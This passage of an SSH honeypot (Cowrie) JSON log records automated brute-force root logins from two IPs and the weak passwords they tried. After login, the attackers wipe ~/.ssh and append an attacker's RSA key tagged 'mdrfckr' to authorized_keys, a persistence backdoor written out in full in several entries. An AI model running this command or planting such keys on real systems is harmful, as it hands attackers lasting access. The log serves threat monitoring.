","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:31:33.531701Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:33.619645Z","src_ip":"212.227.235.229","session":"8af2e6d4d9b8"}
{"eventid":"cowrie.login.success","username":"root","password":"Gu123456","message":"login attempt [root/Gu123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:31:34.652769Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:31:35.236337Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:31:35.237011Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:31:35.237778Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:35.514152Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:31:36.060817Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:31:36.061493Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:31:36.339202Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:36.340106Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":50824,"dst_ip":"1.2.3.4","dst_port":22,"session":"7440e8f5be64","protocol":"ssh","message":"New connection: 68.183.87.241:50824 (1.2.3.4:22) [session: 7440e8f5be64]","sensor":"my-vps","timestamp":"2025-08-26T04:31:36.592324Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:31:36.594114Z","src_ip":"68.183.87.241","session":"7440e8f5be64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:31:36.847251Z","src_ip":"68.183.87.241","session":"7440e8f5be64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45832,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6f02f596194","protocol":"ssh","message":"New connection: 212.227.235.229:45832 (1.2.3.4:22) [session: e6f02f596194]","sensor":"my-vps","timestamp":"2025-08-26T04:31:37.120911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:31:37.121603Z","src_ip":"212.227.235.229","session":"e6f02f596194"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:31:37.197289Z","src_ip":"212.227.235.229","session":"e6f02f596194"}
{"eventid":"cowrie.login.failed","username":"steve","password":"password","message":"login attempt [steve/password] failed","sensor":"my-vps","timestamp":"2025-08-26T04:31:37.539913Z","src_ip":"212.227.235.229","session":"e6f02f596194"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:31:37.882964Z","src_ip":"68.183.87.241","session":"7440e8f5be64"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:38.618233Z","src_ip":"212.227.235.229","session":"e6f02f596194"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:39.138379Z","src_ip":"68.183.87.241","session":"7440e8f5be64"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":50840,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3426dff2ef1","protocol":"ssh","message":"New connection: 68.183.87.241:50840 (1.2.3.4:22) [session: f3426dff2ef1]","sensor":"my-vps","timestamp":"2025-08-26T04:31:39.388503Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:31:39.389183Z","src_ip":"68.183.87.241","session":"f3426dff2ef1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:31:39.642074Z","src_ip":"68.183.87.241","session":"f3426dff2ef1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:31:40.692963Z","src_ip":"68.183.87.241","session":"f3426dff2ef1"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:40.947184Z","src_ip":"68.183.87.241","session":"f3426dff2ef1"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:40.948474Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53070,"dst_ip":"1.2.3.4","dst_port":22,"session":"4bcbd17cbb26","protocol":"ssh","message":"New connection: 212.227.235.229:53070 (1.2.3.4:22) [session: 4bcbd17cbb26]","sensor":"my-vps","timestamp":"2025-08-26T04:31:51.978518Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:31:51.979473Z","src_ip":"212.227.235.229","session":"4bcbd17cbb26"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:31:52.249861Z","src_ip":"212.227.235.229","session":"4bcbd17cbb26"}
{"eventid":"cowrie.login.failed","username":"xmr","password":"xmr123","message":"login attempt [xmr/xmr123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:31:53.369826Z","src_ip":"212.227.235.229","session":"4bcbd17cbb26"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:54.642377Z","src_ip":"212.227.235.229","session":"4bcbd17cbb26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54798,"dst_ip":"1.2.3.4","dst_port":22,"session":"3680e1fd3b47","protocol":"ssh","message":"New connection: 212.227.235.229:54798 (1.2.3.4:22) [session: 3680e1fd3b47]","sensor":"my-vps","timestamp":"2025-08-26T04:32:23.824701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:32:23.825601Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:32:24.111989Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.login.success","username":"root","password":"123asd123","message":"login attempt [root/123asd123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:32:25.300527Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:32:25.929445Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:32:25.930236Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:32:25.931477Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:26.219586Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:32:26.853862Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:32:26.854560Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:32:27.143113Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:27.144081Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54984,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f6b4a584435","protocol":"ssh","message":"New connection: 212.227.235.229:54984 (1.2.3.4:22) [session: 3f6b4a584435]","sensor":"my-vps","timestamp":"2025-08-26T04:32:27.418101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:32:27.419446Z","src_ip":"212.227.235.229","session":"3f6b4a584435"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:32:27.696622Z","src_ip":"212.227.235.229","session":"3f6b4a584435"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:32:28.846295Z","src_ip":"212.227.235.229","session":"3f6b4a584435"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:30.125910Z","src_ip":"212.227.235.229","session":"3f6b4a584435"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55000,"dst_ip":"1.2.3.4","dst_port":22,"session":"58cb82c81b90","protocol":"ssh","message":"New connection: 212.227.235.229:55000 (1.2.3.4:22) [session: 58cb82c81b90]","sensor":"my-vps","timestamp":"2025-08-26T04:32:30.404756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:32:30.405493Z","src_ip":"212.227.235.229","session":"58cb82c81b90"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:32:30.682701Z","src_ip":"212.227.235.229","session":"58cb82c81b90"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:32:31.829891Z","src_ip":"212.227.235.229","session":"58cb82c81b90"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:32:32.109174Z","src_ip":"212.227.235.229","session":"3680e1fd3b47"}
